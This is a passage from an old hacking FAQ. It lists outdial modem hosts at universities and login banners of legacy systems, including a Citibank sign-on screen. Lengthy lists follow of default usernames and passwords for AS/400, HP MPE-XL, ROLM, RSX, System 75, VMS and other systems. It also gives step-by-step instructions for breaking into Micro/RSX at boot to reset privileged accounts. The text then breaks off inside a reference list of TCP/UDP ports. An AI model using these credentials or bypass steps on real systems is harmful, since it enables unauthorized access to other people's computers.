|||
|
515 ISN.RDNS.IASTATE.EDU LOGIN MODEM
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
DIAL ATDT8XXX-YYYY
|
|||
|
602 129.219.17.3 ATDT8,,,,,XYYYXXXYYYY
|
|||
|
|
|||
|
129.219.17.3 LOGIN: MODEM
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (64/1319)
|
|||
|
ATDT 8XXX-XXXX
|
|||
|
609 129.72.1.59 "HAYES"
|
|||
|
|
|||
|
128.119.131.110 "HAYES"
|
|||
|
|
|||
|
128.119.131.111
|
|||
|
|
|||
|
128.119.131.112
|
|||
|
|
|||
|
128.119.131.113
|
|||
|
|
|||
|
128.119.131.114
|
|||
|
|
|||
|
128.112.131.110
|
|||
|
|
|||
|
128.112.131.111
|
|||
|
|
|||
|
128.112.131.112
|
|||
|
|
|||
|
128.112.131.113
|
|||
|
|
|||
|
128.112.131.114 THE ABOVE ARE HAYES
|
|||
|
|
|||
|
#hack FAQ (64/1341)
|
|||
|
614 NS2400.IRCC.OHIO-STATE.EDU DIAL [CAN'T CONNECT]
|
|||
|
615 DCA.UTK.EDU "DIAL2400"
|
|||
|
617 DIALOUT.LCS.MIT.EDU
|
|||
|
619 DIALIN.UCSD.EDU "DIALOUT"
|
|||
|
|
|||
|
128.54.30.1 NUE
|
|||
|
713 128.143.70.101 "CONNECT HAYES"
|
|||
|
|
|||
|
128.249.27.154 C MODEM96
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ATDT 9XXX-XXXX
|
|||
|
|
|||
|
128.249.27.153 " -+ AS ABOVE +- "
|
|||
|
|
|||
|
MODEM24.BCM.TMC.EDU
|
|||
|
|
|||
|
MODEM12.BCM.TMC.EDU
|
|||
|
714 130.191.4.70 ATDT 8XXX-XXXX
|
|||
|
|
|||
|
#hack FAQ (64/1363)
|
|||
|
804 UBLAN.ACC.VIRGINIA.EDU C HAYES
|
|||
|
|
|||
|
128.143.70.101 CONNECT HAYES
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ATDT XXX-XXXX
|
|||
|
902 STAR.CCS.TUNS.CA "DIALOUT" [DOWN...]
|
|||
|
916 128.120.2.251 "DIALOUT" [DOWN...]
|
|||
|
|
|||
|
129.137.33.72 [CAN'T CONNECT]
|
|||
|
??? DIALOUT1.PRINCETON.EDU [CAN'T CONNECT]
|
|||
|
|
|||
|
DSWITCH.BYU.EDU "C MODEM" [CAN'T CONNECT]
|
|||
|
|
|||
|
MODEM.CIS.UFLU.EDU [CAN'T CONNECT]
|
|||
|
|
|||
|
R596ADI1.UC.EDU [CAN'T CONNECT]
|
|||
|
|
|||
|
VTNET1.CNS.UT.EDU "CALL" OR "CALL" [CAN'T CONNECT]
|
|||
|
|
|||
|
#hack FAQ (65/1386)
|
|||
|
18.26.0.55 [CAN'T CONNECT]
|
|||
|
|
|||
|
128.173.5.4 [NEED PASSWORD!]
|
|||
|
|
|||
|
128.187.1.2 [NEED PASSWORD!]
|
|||
|
|
|||
|
129.137.33.71 [CAN'T CONNECT]
|
|||
|
|
|||
|
BSTORM.BGA.COM / PORT=4000 [WHAT IS THIS?]
|
|||
|
|
|||
|
|
|||
|
20. WHAT IS THIS SYSTEM?
|
|||
|
|
|||
|
AS/400
|
|||
|
~~~~~~
|
|||
|
USERID?
|
|||
|
PASSWORD?
|
|||
|
|
|||
|
ONCE IN, TYPE GO MAIN
|
|||
|
|
|||
|
|
|||
|
CDC CYBER
|
|||
|
|
|||
|
#hack FAQ (65/1408)
|
|||
|
~~~~~~~~~
|
|||
|
WELCOME TO THE NOS SOFTWARE SYSTEM.
|
|||
|
COPYRIGHT CONTROL DATA 1978, 1987.
|
|||
|
|
|||
|
88/02/16. 02.36.53. N265100
|
|||
|
CSUS CYBER 170-730. NOS 2.5.2-678/3.
|
|||
|
FAMILY:
|
|||
|
|
|||
|
YOU WOULD NORMALLY JUST HIT RETURN AT THE FAMILY PROMPT. NEXT PROMPT IS:
|
|||
|
|
|||
|
USER NAME:
|
|||
|
|
|||
|
|
|||
|
HEWLETT PACKARD MPE-XL
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
MPE XL:
|
|||
|
EXPECTED A :HELLO COMMAND. (CIERR 6057)
|
|||
|
MPE XL:
|
|||
|
EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)
|
|||
|
MPE XL:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (65/1430)
|
|||
|
GTN
|
|||
|
~~~
|
|||
|
WELCOME TO CITIBANK. PLEASE SIGN ON.
|
|||
|
XXXXXXXX
|
|||
|
|
|||
|
@
|
|||
|
PASSWORD =
|
|||
|
|
|||
|
@
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
PLEASE ENTER YOUR ID:-1->
|
|||
|
PLEASE ENTER YOUR PASSWORD:-2->
|
|||
|
|
|||
|
CITICORP (CITY NAME). KEY GHELP FOR HELP.
|
|||
|
XXX.XXX
|
|||
|
PLEASE SELECT SERVICE REQUIRED.-3->
|
|||
|
|
|||
|
|
|||
|
PRIMOS
|
|||
|
~~~~~~
|
|||
|
|
|||
|
#hack FAQ (65/1452)
|
|||
|
PRIMENET 19.2.7F PPOA1
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ER!
|
|||
|
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
CONNECT
|
|||
|
PRIMENET V 2.3 (SYSTEM)
|
|||
|
LOGIN (YOU)
|
|||
|
USER ID? (SYSTEM)
|
|||
|
SAPB5 (YOU)
|
|||
|
PASSWORD? (SYSTEM)
|
|||
|
DROWSAP (YOU)
|
|||
|
OK, (SYSTEM)
|
|||
|
|
|||
|
|
|||
|
ROLM-OSL
|
|||
|
~~~~~~~~
|
|||
|
MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47
|
|||
|
RELEASE 8003
|
|||
|
|
|||
|
#hack FAQ (65/1474)
|
|||
|
OSL, PLEASE.
|
|||
|
?
|
|||
|
|
|||
|
|
|||
|
TOPS-10
|
|||
|
~~~~~~~
|
|||
|
NIH TIMESHARING
|
|||
|
|
|||
|
NIH TRI-SMP 7.02-FF 16:30:04 TTY11
|
|||
|
SYSTEM 1378/1381/1453 CONNECTED TO NODE HAPPY(40) LINE # 12
|
|||
|
PLEASE LOGIN
|
|||
|
.
|
|||
|
|
|||
|
|
|||
|
VM/370
|
|||
|
~~~~~~
|
|||
|
VM/370
|
|||
|
!
|
|||
|
|
|||
|
|
|||
|
21. WHAT ARE THE DEFAULT ACCOUNTS FOR XXX?
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (65/1496)
|
|||
|
AIX
|
|||
|
~~~
|
|||
|
GUEST GUEST
|
|||
|
|
|||
|
|
|||
|
AS/400
|
|||
|
~~~~~~
|
|||
|
QSECOFR QSECOFR /* MASTER SECURITY OFFICER */
|
|||
|
QSYSOPR QSYSOPR /* SYSTEM OPERATOR */
|
|||
|
QPGMR QPGMR /* DEFAULT PROGRAMMER */
|
|||
|
|
|||
|
ALSO
|
|||
|
|
|||
|
SECOFR/SECOFR (SOMETIMES...)
|
|||
|
IBM/PASSWORD
|
|||
|
IBM/2222
|
|||
|
IBM/SERVICE
|
|||
|
|
|||
|
|
|||
|
HEWLETT PACKARD MPE-XL
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
FORMAT IS ACCOUNT.GROUP,JOB
|
|||
|
|
|||
|
#hack FAQ (66/1519)
|
|||
|
HELLO ACCOUNT PASSWORD
|
|||
|
~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~
|
|||
|
HELLO MANAGER.SYS
|
|||
|
HELLO MGR.SYS
|
|||
|
HELLO FIELD.SUPPORT HPUNSUP OR SUPPORT OR HP
|
|||
|
HELLO OP.OPERATOR
|
|||
|
MGR CAROLIAN
|
|||
|
MGR CCC
|
|||
|
MGR CNAS
|
|||
|
MGR CONV
|
|||
|
MGR COGNOS
|
|||
|
OPERATOR COGNOS
|
|||
|
MANAGER COGNOS
|
|||
|
OPERATOR DISC
|
|||
|
MGR HPDESK
|
|||
|
MGR HPWORD
|
|||
|
FIELD HPWORD
|
|||
|
MGR HPOFFICE
|
|||
|
SPOOLMAN HPOFFICE
|
|||
|
ADVMAIL HPOFFICE
|
|||
|
MAIL HPOFFICE
|
|||
|
WP HPOFFICE
|
|||
|
|
|||
|
#hack FAQ (66/1541)
|
|||
|
MANAGER HPOFFICE
|
|||
|
MGR HPONLY
|
|||
|
FIELD HPP187
|
|||
|
MGR HPP187
|
|||
|
MGR HPP189
|
|||
|
MGR HPP196
|
|||
|
MGR INTX3
|
|||
|
MGR ITF3000
|
|||
|
MANAGER ITF3000
|
|||
|
MAIL MAIL
|
|||
|
MGR NETBASE
|
|||
|
MGR REGO
|
|||
|
MGR RJE
|
|||
|
MGR ROBELLE
|
|||
|
MANAGER SECURITY
|
|||
|
MGR SECURITY
|
|||
|
FIELD SERVICE
|
|||
|
MANAGER SYS
|
|||
|
MGR SYS
|
|||
|
PCUSER SYS
|
|||
|
RSBCMON SYS
|
|||
|
OPERATOR SYS
|
|||
|
|
|||
|
#hack FAQ (66/1563)
|
|||
|
OPERATOR SYSTEM
|
|||
|
FIELD SUPPORT
|
|||
|
OPERATOR SUPPORT
|
|||
|
MANAGER TCH
|
|||
|
MAIL TELESUP
|
|||
|
MANAGER TELESUP
|
|||
|
MGR TELESUP
|
|||
|
SYS TELESUP
|
|||
|
MGE VESOFT
|
|||
|
MGE VESOFT
|
|||
|
MGR WORD
|
|||
|
MGR XLSERVER
|
|||
|
|
|||
|
COMMON JOBS ARE PUB, SYS, DATA
|
|||
|
COMMON PASSWORDS ARE HPONLY, TELESUP, HP, MPE, MANAGER, MGR, REMOTE
|
|||
|
|
|||
|
|
|||
|
PICK O/S
|
|||
|
~~~~~~~~
|
|||
|
DSA # DESQUETOP SYSTEM ADMINISTRATOR
|
|||
|
DS
|
|||
|
DESQUETOP
|
|||
|
|
|||
|
#hack FAQ (66/1585)
|
|||
|
PHANTOM
|
|||
|
|
|||
|
|
|||
|
ROLM
|
|||
|
~~~~
|
|||
|
CBX DEFAULTS
|
|||
|
|
|||
|
OP OP
|
|||
|
OP OPERATOR
|
|||
|
SU SUPER
|
|||
|
ADMIN PWP
|
|||
|
ENG ENGINEER
|
|||
|
|
|||
|
|
|||
|
PHONEMAIL DEFAULTS
|
|||
|
|
|||
|
SYSADMIN SYSADMIN
|
|||
|
TECH TECH
|
|||
|
POLL TECH
|
|||
|
|
|||
|
|
|||
|
RSX
|
|||
|
|
|||
|
#hack FAQ (66/1607)
|
|||
|
~~~
|
|||
|
SYSTEM/SYSTEM (USERNAME SYSTEM, PASSWORD SYSTEM)
|
|||
|
1,1/SYSTEM (DIRECTORY [1,1] PASSWORD SYSTEM)
|
|||
|
BATCH/BATCH
|
|||
|
SYSTEM/MANAGER
|
|||
|
USER/USER
|
|||
|
|
|||
|
DEFAULT ACCOUNTS FOR MICRO/RSX:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
MICRO/RSX
|
|||
|
|
|||
|
ALTERNATELY YOU CAN HIT WHEN THE BOOT SEQUENCE ASKS YOU FOR THE
|
|||
|
DATE AND CREATE AN ACCOUNT USING:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RUN ACNT
|
|||
|
|
|||
|
OR RUN $ACNT
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (66/1629)
|
|||
|
(NUMBERS BELOW 10 {OCT} ARE PRIVELEGED)
|
|||
|
|
|||
|
REBOOT AND WAIT FOR THE DATE/TIME QUESTION. TYPE ^C AND AT THE MCR PROMPT,
|
|||
|
TYPE "ABO AT." YOU MUST INCLUDE THE . DOT!
|
|||
|
|
|||
|
IF THIS WORKS, TYPE "ACS LB0:/BLKS=1000" TO GET SOME SWAP SPACE SO THE
|
|||
|
NEW STEP WON'T WEDGE.
|
|||
|
|
|||
|
TYPE " RUN $ACNT" AND CHANGE THE PASSWORD OF ANY ACCOUNT WITH A GROUP
|
|||
|
NUMBER OF 7 OR LESS.
|
|||
|
|
|||
|
YOU MAY FIND THAT THE ^C DOES NOT WORK. TRY ^Z AND ESC AS WELL.
|
|||
|
ALSO TRY ALL 3 AS TERMINATORS TO VALID AND INVALID TIMES.
|
|||
|
|
|||
|
IF NONE OF THE ABOVE WORK, USE THE HALT SWITCH TO HALT THE SYSTEM,
|
|||
|
JUST AFTER A INVALID DATE-TIME. LOOK FOR A USER MODE PSW 1[4-7]XXXX.
|
|||
|
THEN DEPOSIT 177777 INTO R6, CROSS YOUR FINGERS, WRITE PROTECT THE DRIVE
|
|||
|
AND CONTINUE THE SYSTEM. THIS WILL HOPEFULLY RESULT IN INDIRECT BLOWING
|
|||
|
UP... AND HOPEFULLY THE SYSTEM HAS NOT BEEN FULLY SECURED.
|
|||
|
|
|||
|
|
|||
|
SYSTEM 75
|
|||
|
|
|||
|
#hack FAQ (66/1651)
|
|||
|
~~~~~~~~~
|
|||
|
USERNAME PASSWORDS
|
|||
|
~~~~~~~~ ~~~~~~~~~
|
|||
|
BCIM BCIMPW
|
|||
|
BCIIM BCIIMPW
|
|||
|
BCMS BCMSPW, BCMS
|
|||
|
BCNAS BCNSPW
|
|||
|
BLUE BLUEPW
|
|||
|
BROWSE LOOKER, BROWSEPW
|
|||
|
CRAFT CRFTPW, CRAFTPW, CRACK
|
|||
|
CUST CUSTPW
|
|||
|
ENQUIRY ENQUIRYPW
|
|||
|
FIELD SUPPORT
|
|||
|
INADS INDSPW, INADSPW, INADS
|
|||
|
INIT INITPW
|
|||
|
KRAFT KRAFTPW
|
|||
|
LOCATE LOCATEPW
|
|||
|
MAINT MAINTPW, RWMAINT
|
|||
|
NMS NMSPW
|
|||
|
RCUST RCUSTPW
|
|||
|
SUPPORT SUPPORTPW
|
|||
|
TECH FIELD
|
|||
|
|
|||
|
#hack FAQ (70/1677)
|
|||
|
VERIFONE JUNIOR 2.05
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
DEFAULT PASSWORD: 166816
|
|||
|
|
|||
|
|
|||
|
VMS
|
|||
|
~~~
|
|||
|
FIELD SERVICE
|
|||
|
SYSTEST UTEP
|
|||
|
|
|||
|
|
|||
|
22. WHAT PORT IS XXX ON?
|
|||
|
|
|||
|
THE FILE /ETC/SERVICES ON MOST UNIX MACHINES LISTS THE ACTIVITY
|
|||
|
OCCURRING ON EACH PORT. HERE IS THE MOST COMPLETE PORT LIST IN
|
|||
|
EXISTENCE, ORIGINALLY PRESENTED IN RFC 1340:
|
|||
|
|
|||
|
KEYWORD DECIMAL DESCRIPTION
|
|||
|
------- ------- -----------
|
|||
|
0/TCP RESERVED
|
|||
|
0/UDP RESERVED
|
|||
|
TCPMUX 1/TCP TCP PORT SERVICE MULTIPLEXER
|
|||
|
|
|||
|
#hack FAQ (70/1699)
|
|||
|
TCPMUX 1/UDP TCP PORT SERVICE MULTIPLEXER
|
|||
|
COMPRESSNET 2/TCP MANAGEMENT UTILITY
|
|||
|
COMPRESSNET 2/UDP MANAGEMENT UTILITY
|
|||
|
COMPRESSNET 3/TCP COMPRESSION PROCESS
|
|||
|
COMPRESSNET 3/UDP COMPRESSION PROCESS
|
|||
|
4/TCP UNASSIGNED
|
|||
|
4/UDP UNASSIGNED
|
|||
|
RJE 5/TCP REMOTE JOB ENTRY
|
|||
|
RJE 5/UDP REMOTE JOB ENTRY
|
|||
|
6/TCP UNASSIGNED
|
|||
|
6/UDP UNASSIGNED
|
|||
|
ECHO 7/TCP ECHO
|
|||
|
ECHO 7/UDP ECHO
|
|||
|
8/TCP UNASSIGNED
|
|||
|
8/UDP UNASSIGNED
|
|||
|
DISCARD 9/TCP DISCARD
|
|||
|
DISCARD 9/UDP DISCARD
|
|||
|
10/TCP UNASSIGNED
|
|||
|
10/UDP UNASSIGNED
|
|||
|
SYSTAT 11/TCP ACTIVE USERS
|
|||
|
SYSTAT 11/UDP ACTIVE USERS
|
|||
|
12/TCP UNASSIGNED
|
|||
|
|
|||
|
#hack FAQ (70/1721)
|
|||
|
12/UDP UNASSIGNED
|
|||
|
DAYTIME 13/TCP DAYTIME
|
|||
|
DAYTIME 13/UDP DAYTIME
|
|||
|
14/TCP UNASSIGNED
|
|||
|
14/UDP UNASSIGNED
|
|||
|
15/TCP UNASSIGNED [WAS NETSTAT]
|
|||
|
15/UDP UNASSIGNED
|
|||
|
16/TCP UNASSIGNED
|
|||
|
16/UDP UNASSIGNED
|
|||
|
QOTD 17/TCP QUOTE OF THE DAY
|
|||
|
QOTD 17/UDP QUOTE OF THE DAY
|
|||
|
MSP 18/TCP MESSAGE SEND PROTOCOL
|
|||
|
MSP 18/UDP MESSAGE SEND PROTOCOL
|
|||
|
CHARGEN 19/TCP CHARACTER GENERATOR
|
|||
|
CHARGEN 19/UDP CHARACTER GENERATOR
|
|||
|
FTP-DATA 20/TCP FILE TRANSFER [DEFAULT DATA]
|
|||
|
FTP-DATA 20/UDP FILE TRANSFER [DEFAULT DATA]
|
|||
|
FTP 21/TCP FILE TRANSFER [CONTROL]
|
|||
|
FTP 21/UDP FILE TRANSFER [CONTROL]
|
|||
|
22/TCP UNASSIGNED
|
|||
|
22/UDP UNASSIGNED
|
|||
|
TELNET 23/TCP TELNET
|
|||
|
|
|||
|
#hack FAQ (70/1743)
|
|||
|
TELNET 23/UDP TELNET
|
|||
|
24/TCP ANY PRIVATE MAIL SYSTEM
|
|||
|
24/UDP ANY PRIVATE MAIL SYSTEM
|
|||
|
SMTP 25/TCP SIMPLE MAIL TRANSFER
|
|||
|
SMTP 25/UDP SIMPLE MAIL TRANSFER
|
|||
|
26/TCP UNASSIGNED
|
|||
|
26/UDP UNASSIGNED
|
|||
|
NSW-FE 27/TCP NSW USER SYSTEM FE
|
|||
|
NSW-FE 27/UDP NSW USER SYSTEM FE
|
|||
|
28/TCP UNASSIGNED
|
|||
|
28/UDP UNASSIGNED
|
|||
|
MSG-ICP 29/TCP MSG ICP
|
|||
|
MSG-ICP 29/UDP MSG ICP
|
|||
|
30/TCP UNASSIGNED
|
|||
|
30/UDP UNASSIGNED
|
|||
|
MSG-AUTH 31/TCP MSG AUTHENTICATION
|
|||
|
MSG-AUTH 31/UDP MSG AUTHENTICATION
|
|||
|
32/TCP UNASSIGNED
|
|||
|
32/UDP UNASSIGNED
|
|||
|
DSP 33/TCP DISPLAY SUPPORT PROTOCOL
|
|||
|
DSP 33/UDP DISPLAY SUPPORT PROTOCOL
|
|||
|
34/TCP UNASSIGNED
|
|||
|
|
|||
|
#hack FAQ (70/1765)
|
|||
|
34/UDP UNASSIGNED
|
|||
|
35/TCP ANY PRIVATE PRINTER SERVER
|
|||
|
35/UDP ANY PRIVATE PRINTER SERVER
|
|||
|
36/TCP UNASSIGNED
|
|||
|
36/UDP UNASSIGNED
|
|||
|
TIME 37/TCP TIME
|
|||
|
TIME 37/UDP TIME
|
|||
|
38/TCP UNASSIGNED
|
|||
|
38/UDP UNASSIGNED
|
|||
|
RLP 39/TCP RESOURCE LOCATION PROTOCOL
|
|||
|
RLP 39/UDP RESOURCE LOCATION PROTOCOL
|
|||
|
40/TCP UNASSIGNED
|
|||
|
40/UDP UNASSIGNED
|
|||
|
GRAPHICS 41/TCP GRAPHICS
|
|||
|
GRAPHICS 41/UDP GRAPHICS
|
|||
|
NAMESERVER 42/TCP HOST NAME SERVER
|
|||
|
NAMESERVER 42/UDP HOST NAME SERVER
|
|||
|
NICNAME 43/TCP WHO IS
|
|||
|
NICNAME 43/UDP WHO IS
|
|||
|
MPM-FLAGS 44/TCP MPM FLAGS PROTOCOL
|
|||
|
MPM-FLAGS 44/UDP MPM FLAGS PROTOCOL
|
|||
|
MPM 45/TCP MESSAGE PROCESSING MODULE [RECV]
|
|||
|
|
|||
|
#hack FAQ (70/1787)
|
|||
|
MPM 45/UDP MESSAGE PROCESSING MODULE [RECV]
|
|||
|
MPM-SND 46/TCP MPM [DEFAULT SEND]
|
|||
|
MPM-SND 46/UDP MPM [DEFAULT SEND]
|
|||
|
NI-FTP 47/TCP NI FTP
|
|||
|
NI-FTP 47/UDP NI FTP
|
|||
|
48/TCP UNASSIGNED
|
|||
|
48/UDP UNASSIGNED
|
|||
|
LOGIN 49/TCP LOGIN HOST PROTOCOL
|
|||
|
LOGIN 49/UDP LOGIN HOST PROTOCOL
|
|||
|
RE-MAIL-CK 50/TCP REMOTE MAIL CHECKING PROTOCOL
|
|||
|
RE-MAIL-CK 50/UDP REMOTE MAIL CHECKING PROTOCOL
|
|||
|
LA-MAINT 51/TCP IMP LOGICAL ADDRESS MAINTENANCE
|
|||
|
LA-MAINT 51/UDP IMP LOGICAL ADDRESS MAINTENANCE
|
|||
|
XNS-TIME 52/TCP XNS TIME PROTOCOL
|
|||
|
XNS-TIME 52/UDP XNS TIME PROTOCOL
|
|||
|
DOMAIN 53/TCP DOMAIN NAME SERVER
|
|||
|
DOMAIN 53/UDP DOMAIN NAME SERVER
|
|||
|
XNS-CH 54/TCP XNS CLEARINGHOUSE
|
|||
|
XNS-CH 54/UDP XNS CLEARINGHOUSE
|
|||
|
ISI-GL 55/TCP ISI GRAPHICS LANGUAGE
|
|||
|
ISI-GL 55/UDP ISI GRAPHICS LANGUAGE
|
|||
|
XNS-AUTH 56/TCP XNS AUTHENTICATION
|
|||
|
|
|||
|
#hack FAQ (70/1809)
|
|||
|
XNS-AUTH 56/UDP XNS AUTHENTICATION
|
|||
|
57/TCP ANY PRIVATE TERMINAL ACCESS
|
|||
|
57/UDP ANY PRIVATE TERMINAL ACCESS
|
|||
|
XNS-MAIL 58/TCP XNS MAIL
|
|||
|
XNS-MAIL 58/UDP XNS MAIL
|
|||
|
59/TCP ANY PRIVATE FILE SERVICE
|
|||
|
59/UDP ANY PRIVATE FILE SERVICE
|
|||
|
60/TCP UNASSIGNED
|
|||
|
60/UDP UNASSIGNED
|
|||
|
NI-MAIL 61/TCP NI MAIL
|
|||
|
NI-MAIL 61/UDP NI MAIL
|
|||
|
ACAS 62/TCP ACA SERVICES
|
|||
|
ACAS 62/UDP ACA SERVICES
|
|||
|
VIA-FTP 63/TCP VIA SYSTEMS - FTP
|
|||
|
VIA-FTP 63/UDP VIA SYSTEMS - FTP
|
|||
|
COVIA 64/TCP COMMUNICATIONS INTEGRATOR (CI)
|
|||
|
COVIA 64/UDP COMMUNICATIONS INTEGRATOR (CI)
|
|||
|
TACACS-DS 65/TCP TACACS-DATABASE SERVICE
|
|||
|
TACACS-DS 65/UDP TACACS-DATABASE SERVICE
|
|||
|
SQL*NET 66/TCP ORACLE SQL*NET
|
|||
|
SQL*NET 66/UDP ORACLE SQL*NET
|
|||
|
BOOTPS 67/TCP BOOTSTRAP PROTOCOL SERVER
|
|||
|
|
|||
|
#hack FAQ (70/1831)
|
|||
|
BOOTPS 67/UDP BOOTSTRAP PROTOCOL SERVER
|
|||
|
BOOTPC 68/TCP BOOTSTRAP PROTOCOL CLIENT
|
|||
|
BOOTPC 68/UDP BOOTSTRAP PROTOCOL CLIENT
|
|||
|
TFTP 69/TCP TRIVIAL FILE TRANSFER
|
|||
|
TFTP 69/UDP TRIVIAL FILE TRANSFER
|
|||
|
GOPHER 70/TCP GOPHER
|
|||
|
GOPHER 70/UDP GOPHER
|
|||
|
NETRJS-1 71/TCP REMOTE JOB SERVICE
|
|||
|
NETRJS-1 71/UDP REMOTE JOB SERVICE
|
|||
|
NETRJS-2 72/TCP REMOTE JOB SERVICE
|
|||
|
NETRJS-2 72/UDP REMOTE JOB SERVICE
|
|||
|
NETRJS-3 73/TCP REMOTE JOB SERVICE
|
|||
|
NETRJS-3 73/UDP REMOTE JOB SERVICE
|
|||
|
NETRJS-4 74/TCP REMOTE JOB SERVICE
|
|||
|
NETRJS-4 74/UDP REMOTE JOB SERVICE
|
|||
|
75/TCP ANY PRIVATE DIAL OUT SERVICE
|
|||
|
75/UDP ANY PRIVATE DIAL OUT SERVICE
|
|||
|
76/TCP UNASSIGNED
|
|||
|
76/UDP UNASSIGNED
|
|||
|
77/TCP ANY PRIVATE RJE SERVICE
|
|||
|
77/UDP ANY PRIVATE RJE SERVICE
|
|||
|
VETTCP 78/TCP VETTCP
|
|||
|
|
|||
|
#hack FAQ (70/1853)
|
|||
|
VETTCP 78/UDP VETTCP
|
|||
|
FINGER 79/TCP FINGER
|
|||
|
FINGER 79/UDP FINGER
|
|||
|
WWW 80/TCP WORLD WIDE WEB HTTP
|
|||
|
WWW 80/UDP WORLD WIDE WEB HTTP
|
|||
|
HOSTS2-NS 81/TCP HOSTS2 NAME SERVER
|
|||
|
HOSTS2-NS 81/UDP HOSTS2 NAME SERVER
|
|||
|
XFER 82/TCP XFER UTILITY
|
|||
|
XFER 82/UDP XFER UTILITY
|
|||
|
MIT-ML-DEV 83/TCP MIT ML DEVICE
|
|||
|
MIT-ML-DEV 83/UDP MIT ML DEVICE
|
|||
|
CTF 84/TCP COMMON TRACE FACILITY
|
|||
|
CTF 84/UDP COMMON TRACE FACILITY
|
|||
|
MIT-ML-DEV 85/TCP MIT ML DEVICE
|
|||
|
MIT-ML-DEV 85/UDP MIT ML DEVICE
|
|||
|
MFCOBOL 86/TCP MICRO FOCUS COBOL
|
|||
|
MFCOBOL 86/UDP MICRO FOCUS COBOL
|
|||
|
87/TCP ANY PRIVATE TERMINAL LINK
|
|||
|
87/UDP ANY PRIVATE TERMINAL LINK
|
|||
|
KERBEROS 88/TCP KERBEROS
|
|||
|
KERBEROS 88/UDP KERBEROS
|
|||
|
SU-MIT-TG 89/TCP SU/MIT TELNET GATEWAY
|
|||
|
|
|||
|
#hack FAQ (70/1875)
|
|||
|
SU-MIT-TG 89/UDP SU/MIT TELNET GATEWAY
|
|||
|
DNSIX 90/TCP DNSIX SECURIT ATTRIBUTE TOKEN MAP
|
|||
|
DNSIX 90/UDP DNSIX SECURIT ATTRIBUTE TOKEN MAP
|
|||
|
MIT-DOV 91/TCP MIT DOVER SPOOLER
|
|||
|
MIT-DOV 91/UDP MIT DOVER SPOOLER
|
|||
|
NPP 92/TCP NETWORK PRINTING PROTOCOL
|
|||
|
NPP 92/UDP NETWORK PRINTING PROTOCOL
|
|||
|
DCP 93/TCP DEVICE CONTROL PROTOCOL
|
|||
|
DCP 93/UDP DEVICE CONTROL PROTOCOL
|
|||
|
OBJCALL 94/TCP TIVOLI OBJECT DISPATCHER
|
|||
|
OBJCALL 94/UDP TIVOLI OBJECT DISPATCHER
|
|||
|
SUPDUP 95/TCP SUPDUP
|
|||
|
SUPDUP 95/UDP SUPDUP
|
|||
|
DIXIE 96/TCP DIXIE PROTOCOL SPECIFICATION
|
|||
|
DIXIE 96/UDP DIXIE PROTOCOL SPECIFICATION
|
|||
|
SWIFT-RVF 97/TCP SWIFT REMOTE VITURAL FILE PROTOCOL
|
|||
|
SWIFT-RVF 97/UDP SWIFT REMOTE VITURAL FILE PROTOCOL
|
|||
|
TACNEWS 98/TCP TAC NEWS
|
|||
|
TACNEWS 98/UDP TAC NEWS
|
|||
|
METAGRAM 99/TCP METAGRAM RELAY
|
|||
|
METAGRAM 99/UDP METAGRAM RELAY
|
|||
|
NEWACCT 100/TCP [UNAUTHORIZED USE]
|
|||
|
|
|||
|
#hack FAQ (70/1897)
|
|||
|
HOSTNAME 101/TCP NIC HOST NAME SERVER
|
|||
|
HOSTNAME 101/UDP NIC HOST NAME SERVER
|
|||
|
ISO-TSAP 102/TCP ISO-TSAP
|
|||
|
ISO-TSAP 102/UDP ISO-TSAP
|
|||
|
GPPITNP 103/TCP GENESIS POINT-TO-POINT TRANS NET
|
|||
|
GPPITNP 103/UDP GENESIS POINT-TO-POINT TRANS NET
|
|||
|
ACR-NEMA 104/TCP ACR-NEMA DIGITAL IMAG. & COMM. 300
|
|||
|
ACR-NEMA 104/UDP ACR-NEMA DIGITAL IMAG. & COMM. 300
|
|||
|
CSNET-NS 105/TCP MAILBOX NAME NAMESERVER
|
|||
|
CSNET-NS 105/UDP MAILBOX NAME NAMESERVER
|
|||
|
3COM-TSMUX 106/TCP 3COM-TSMUX
|
|||
|
3COM-TSMUX 106/UDP 3COM-TSMUX
|
|||
|
RTELNET 107/TCP REMOTE TELNET SERVICE
|
|||
|
RTELNET 107/UDP REMOTE TELNET SERVICE
|
|||
|
SNAGAS 108/TCP SNA GATEWAY ACCESS SERVER
|
|||
|
SNAGAS 108/UDP SNA GATEWAY ACCESS SERVER
|
|||
|
POP2 109/TCP POST OFFICE PROTOCOL - VERSION 2
|
|||
|
POP2 109/UDP POST OFFICE PROTOCOL - VERSION 2
|
|||
|
POP3 110/TCP POST OFFICE PROTOCOL - VERSION 3
|
|||
|
POP3 110/UDP POST OFFICE PROTOCOL - VERSION 3
|
|||
|
SUNRPC 111/TCP SUN REMOTE PROCEDURE CALL
|
|||
|
SUNRPC 111/UDP SUN REMOTE PROCEDURE CALL
|
|||
|
|
|||
|
#hack FAQ (70/1919)
|
|||
|
MCIDAS 112/TCP MCIDAS DATA TRANSMISSION PROTOCOL
|
|||
|
MCIDAS 112/UDP MCIDAS DATA TRANSMISSION PROTOCOL
|
|||
|
AUTH 113/TCP AUTHENTICATION SERVICE
|
|||
|
AUTH 113/UDP AUTHENTICATION SERVICE
|
|||
|
AUDIONEWS 114/TCP AUDIO NEWS MULTICAST
|
|||
|
AUDIONEWS 114/UDP AUDIO NEWS MULTICAST
|
|||
|
SFTP 115/TCP SIMPLE FILE TRANSFER PROTOCOL
|
|||
|
